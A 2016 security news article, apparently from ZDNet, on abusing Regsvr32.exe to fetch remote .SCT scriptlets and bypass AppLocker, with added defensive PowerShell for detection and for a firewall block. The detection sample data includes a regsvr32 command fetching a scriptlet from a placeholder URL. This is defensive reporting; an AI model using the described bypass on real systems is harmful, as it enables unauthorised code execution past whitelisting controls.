Monday, 25 April 2016

Posted at 04:19 by admin
The Windows command line utility Regsvr32.exe can be abused to bypass Microsoft Windows AppLocker application whitelisting, potentially leading to remote code execution.

The security flaw can be used to circumvent the application whitelist protections that AppLocker offers on business editions of Windows 7 and later, by pointing the command line utility at a file or location controlled by an attacker.

As a result, an attacker-supplied file or script can launch an application on a Windows system that AppLocker policy would otherwise block.

The researcher said that COM+ scripts, XML documents that register COM objects for use on the PC, can be crafted to bypass AppLocker; all that is needed is a script block, and running the script through deregistration rather than registration removes the need for admin rights.

In addition, the technique requires no tampering with the system that would leave tracks, a bonus for attackers attempting to hide their activity.

COM+ scripts, otherwise known as .SCT files, need not reside on the local machine, so Smith was able to load a script from a remote host. Because the command line utility is also proxy- and network-aware, an intruder could cause havoc on a network once a single PC is compromised.

“All you need to do is host your .SCT file at a location you control,” the researcher said. “It’s not well documented that Regsvr32.exe can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS, inside the registration element.”
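The two observable traits the researcher describes, Regsvr32.exe being handed a URL or an .SCT scriptlet, are what a defender can hunt for in process-creation logs. The PowerShell below is an added example for this article, not code from the researcher or from the PoC, and it runs over constructed sample command lines rather than real telemetry; the function name and the sample host `example.invalid` are assumptions made for the illustration.

```powershell
# Added example (not from the article): flag process-creation command lines in which
# regsvr32.exe is given an http(s) URL or an .sct scriptlet, the pattern described above.
# The log lines below are constructed sample data, not real telemetry.

function Find-SuspiciousRegsvr32 {
    param(
        [Parameter(Mandatory)]
        [string[]] $CommandLines
    )

    # regsvr32 (with or without a path or .exe suffix) followed anywhere in its
    # arguments by an http(s) URL or a .sct file. PowerShell -match is case-insensitive.
    $pattern = '\bregsvr32(\.exe)?\b.*(https?://|\.sct\b)'

    foreach ($line in $CommandLines) {
        if ($line -match $pattern) {
            $reason = if ($line -match 'https?://') { 'remote script fetched by URL' }
                      else                          { 'local .sct scriptlet' }
            [pscustomobject]@{
                CommandLine = $line
                Reason      = $reason
            }
        }
    }
}

# Constructed sample command lines (hypothetical, for illustration only)
$sample = @(
    'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',               # ordinary DLL registration: not flagged
    'regsvr32.exe http://example.invalid/script.sct',                      # remote scriptlet by URL: flagged
    'C:\Windows\SysWOW64\regsvr32.exe C:\Users\Public\update.sct',         # local scriptlet: flagged
    'rundll32.exe shell32.dll,Control_RunDLL'                              # unrelated process: not flagged
)

Find-SuspiciousRegsvr32 -CommandLines $sample | Format-Table -AutoSize
```

In a real deployment the `$sample` array would be replaced by the `CommandLine` field of Sysmon event ID 1 or Windows Security event 4688 (with command-line auditing enabled); the first sample line shows why the rule keys on the URL or `.sct` argument rather than on regsvr32 itself, since legitimate DLL registration by installers is common.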

Proof-of-concept (PoC) code is available on GitHub.

There is currently no patch for the security flaw. In the meantime, however, you can block Regsvr32.exe's network access with Windows Firewall to mitigate the problem.
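The firewall mitigation mentioned above can be applied with the NetSecurity cmdlets that ship with Windows 8 / Server 2012 and later. This is an added example written for this article, not Microsoft's or the researcher's code; the rule display names are an assumption, and it must be run from an elevated PowerShell prompt.

```powershell
# Added example (not from the article): block outbound network access for both copies of
# regsvr32.exe with Windows Firewall, so the utility cannot fetch a script from a remote URL.
# Requires an elevated prompt and the NetSecurity module (Windows 8 / Server 2012 or later).

$targets = @(
    "$env:SystemRoot\System32\regsvr32.exe",
    "$env:SystemRoot\SysWOW64\regsvr32.exe"   # 32-bit copy present only on 64-bit Windows
)

foreach ($exe in $targets) {
    if (-not (Test-Path $exe)) { continue }   # skip the SysWOW64 copy on 32-bit Windows

    $name = "Block outbound - $exe"           # assumed naming convention for the rule
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name `
                            -Direction   Outbound `
                            -Program     $exe `
                            -Action      Block `
                            -Profile     Any `
                            -Enabled     True | Out-Null
    }
}

# Confirm the rules exist and are enabled
Get-NetFirewallRule -DisplayName 'Block outbound - *' |
    Select-Object DisplayName, Direction, Action, Enabled
```

On Windows 7, which lacks the NetSecurity module, the equivalent rule is `netsh advfirewall firewall add rule name="Block outbound regsvr32" dir=out action=block program="C:\Windows\System32\regsvr32.exe"`. Note the limit of this mitigation: it stops the remote-URL case the researcher demonstrated, but the article also notes that .SCT files can be local, so the firewall rule should be paired with the command-line monitoring described earlier rather than relied on alone.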


ZDNet has reached out to Microsoft and will update if we hear back.
